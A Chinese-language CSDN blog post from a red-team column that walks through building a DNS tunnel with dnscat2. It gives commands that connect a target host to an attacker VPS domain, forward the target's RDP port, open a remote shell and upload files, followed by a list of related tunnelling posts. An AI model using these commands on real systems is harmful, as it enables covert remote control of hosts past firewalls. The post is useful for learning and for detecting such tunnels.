DNS隧道的利用

已于 2023-09-05 11:26:37 修改
阅读量2.5k 收藏 2
点赞数
分类专栏: 红队技巧 文章标签: 安全 web安全 网络安全
于 2022-03-08 17:33:51 首次发布
仅供学习,未经许可不得擅自转载
本文链接:https://blog.csdn.net/weixin_42282667/article/details/123358927
版权
本文详细介绍了DNS隧道的工作原理,通过设置DNS服务器NS记录和A记录,利用dnscat2工具在客户端和服务端之间建立加密的DNS隧道。在VPS上配置dnscat2服务端,客户端通过指定域名和密钥连接,实现数据交互。此外,还展示了如何利用DNS隧道进行端口转发,如将VPS的990端口映射到客户端的RDP服务,以及执行命令和文件传输等操作。
摘要由CSDN通过智能技术生成

DNS隧道的利用

前言

域名系统(Domain Name System,缩写:DNS)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用TCP和UDP端口53。当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符。DNS协议是用来将域名转换为IP地址(也可以将IP地址转换为相应的域名地址)

dns隧道的原理

客户端与服务端(NS记录)建立dns隧道,客户端将域名(通常为子域名)解析的数据包(QR标记0)全部传送给A记录指向的服务器,之后所指向dns服务器对数据包进行响应(QR标记为1)。在这个过程中,将payload插入到dns数据包中的TXT记录字段或者子域名字段,从而实现客户端与服务端的数据交互。

利用dnscat2建立dns隧道

准备

vps配置ns记录
例如:
dns.douhu.xyz的ns记录为119.23.104.162,此时dns.douhu.xyz域名的dns服务器为119.23.104.162

配置完成后,可通过在vps使用tcpdump抓取dns数据包验证配置是否成功

tcpdump -n -i eth0 udp dst port 53


vps安装dnscat2
vps安装dnscat2,做为dnscat2的服务端
https://github.com/iagox86/dnscat2
下载完成后进入dnscat2的server目录,执行以下命令安装依赖

#安装bundler
gem install bundler 
#更新系统中存在的项目依赖包
bundle install

利用过程

vps运行dnscat2做为服务端

#x.domain.com为配置ns服务器A记录域名,--secret=123456为dns流量加密传输设置的加密密码。
sudo ruby ./dnscat2.rb x.domain.com --secret=123456


目标主机(客户端)运行dnscat2,与vps建立dns通道

dnscat2-v0.07-client-win32.exe --secret=123456 x.domain.com


通道建立成功后,使用sessions命令查看当前的所有客户端会话ID
使用window -i id进入会话

端口转发
listen端口转发

#将vps(服务端)的990端口重定向至客户端的3389端口,此时连接vps的990端口就是客户端的Rdp服务
listen 127.0.0.1:990 192.168.187.130:3389


执行命令
执行shell后,会新建一个会话获取客户端的shell环境


上传文件
upload上传文件至客户端

upload ../../portmap.c c:\windows\temp\123.txt

使用exit退出当前会话,使用Kill id停止dns隧道

supdon
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
应用层DNS隧道
战神/calmness的博客
11-19 180
我们测试一下使用dns反弹shell,用于测试的域名:test.njcx.bid 该域名的dns服务器位于 ns1.njcx.bid(公网ip:111.222.333.444) 受控机Windows7 :172.16.42.134 控制机 CentOS7:111.222.333.444 我们用到的工具DNS-Shell,我们在 CentOS7 上面执行 python DNS-shell.py -l -r test.njcx.bid ,接收由受控机过来的shell,执行后会生成一个 power...
Cobalt Strike中DNS隐蔽隧道利用,以及使用DLP进行检测.pdf
03-02
同时,如何利用市面现有产品实施检测的指导文章也凤毛麟角。因此,笔者计划编写系列教程,介绍演示常见外部入侵和内部威胁的手段、战术、以及工具,并给出使用现有成熟产品进行检测和响应的实际方法。
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)
04-13
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)。 dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发。它分为两个部分,服务端和客户端,服务端运行在linux服务器上,客户端可以运行在linux和windows上(其他平台没有测试过),编译完成后在服务端上的可执行文件名称为dns2tcpd,在客户端(linux)上的名称为dns2tcpc,kali默认安装了二者。 dns2tcp 官方最新版 dns隧道
阿一课代表今日分享之使用dnscat2 进行dns隧道反弹shell(直连模式linux对linux)
最新发布
qq_69775412的博客
07-10 911
Dns解析过程:系统发出dns解析之前会先看看本地是否保存了相关域名的解析,系统检测到hosts文件中没有响应的域名解析的时候会发送给本地dns解析服务器进行解析,解析之前会看看缓存中是否存在,如果没有,再将解析请求发给下一个dns服务器。gem install bundler 是一个在 Ruby 环境中使用的命令,用于安装 Bundler 这个 gem(gem 是 Ruby 的包管理器)Bundler 是一个帮助管理 Ruby 项目依赖的工具,它可以确保你的项目在不同的环境中使用相同版本的 gems。
DNS隧道
swordheart的博客
01-24 5029
DNS隧道 原理说明 DNS隧道是一种隐秘隧道,通过将其他协议封装到DNS协议中传输建立通信的方式。因为DNS协议在网络中一种基础必不可少的服务,所以大部分防火墙和入侵检测设备是不会对对DNS流量进行拦截过滤,这就给DNS作为隐蔽通信提供了有力条件,从而可以利用它实现诸如僵尸网络或木马的远程控制通道和对外传输数据等。 DNS隧道运营的原理可以归结为:“如果你不知道,请问别人”。当DNS服务器收到要解析的地址的DNS请求时,服务器开始在其数据库中查找。如果没有找到记录,则服务器向数据库中指定的域发送请求
DNS协议隧道(1)
分享学习网络的点点滴滴
09-29 639
windows 2008:安装DNS服务,配置转发器,创建区域lab.com;指派二级域test.lab.com,NS记录指向kali防火墙:只允许出站UDP 53端口流量Ubuntu:安装dns2tcp、wireshark、firefox。
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)rar
09-24
dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发。它分为两个部分,服务端和客户端,服务端运行在linux服务器上,客户端可以运行在linux和windows上(其他平台没有测试过),编译完成后在服务端上的可...
netcross:一个 IP over DNS 隧道工具-开源
07-11
Netcross 是一种隧道软件,在受限(读取防火墙)网络环境中特别有用,它能够利用域名解析请求/响应建立 IP 隧道。 当前的实现非常不稳定,主要用于测试和研究目的。 目前 Netcross 带有以下传输模块: - DNS 上的 ...
内网隐藏通信隧道技术——DNS隧道
Innocence_0的博客
08-22 1197
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
内网渗透之DNS隧道搭建
蚁景网安学院
08-26 1009
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 本文作者:D1m0n 前言 年初有幸参加了一次hvv,我主要负责内网渗透的部分,包括代理搭建,横向移动等等。那个时候,也是刚刚接触内网没两个月,赶鸭子上架的学了一下就上了战场。好在运气不错,通过weblogic的反序列化RCE拿到系统权限,后来发现了一个尴尬的问题,目标主机不出网,借助搜索引擎,大佬们都.
4、DNS隧道
Fly_鹏程万里
06-08 1665
0x00 前言前两天和朋友说到代理,随之讨论了一下关于隧道技术,之前也发过一篇关于DNS隧道技术的文章,不过感觉没有写好,今天就重写一下关于隧道技术的总结;首先这篇文章是以前写的,也发在乌云过,最近为博客更新一些隧道技术的东西,所以先把这篇老文章拿出来,后面会更新一些新的东西,也欢迎大家提出新的思路;0x01 概念隧道技术(Tunneling)是一种通过使用互联网络的基础设施在网络之间传递数据的方...
DNS隧道+FRP隧道
snowman12138的博客
03-02 2059
DNS隧道,是隧道技术的一种。当我们HTTP、HTTPS这样的上层协议、正反向端口转发都失败的时候,可以尝试DNS隧道DNS隧道很难防范,因为平时的业务等功能难免会用到DNS协议进行解析,所以防火墙大多对DNS流量是放行的状态。这时候,如果我们在不出机器构造一个恶意的域名,本地DNS服务器无法给出回答时,就会以迭代查询的方式通过互联网定位到所查询域的权威DNS服务器。最后,这条DNS请求会落到我们提前搭建好的恶意DNS服务器上,于是乎,我们的不出网主机就和恶意DNS服务器交流上了。
红队隧道应用篇之DNS协议传输(九)
xf555er的博客
09-06 563
DNS隧道是一种相对隐蔽的隧道, 通过将其他协议封装到DNS协议中来进行传输通信因为DNS协议是网络中的基础协议且必不可少, 所以大部分防火墙和入侵检测设备是不会对DNS流量进行拦截, 这就给DNS作为隐蔽通信提供了有力条件, 从而可以利用它实现诸如僵尸网络或木马的远程控制通道和对外传输数据等等用户端直接和指定的目标DNS服务器建立连接,然后将需要传输的数据编码封装在DNS协议中进行通信。这种方式的优点是具有较高速度,但蔽性弱、易被探测追踪的缺点也很明显。
内网渗透系列:内网隧道DNS隧道
闵行小鱼塘
07-07 4079
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习DNS隧道
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值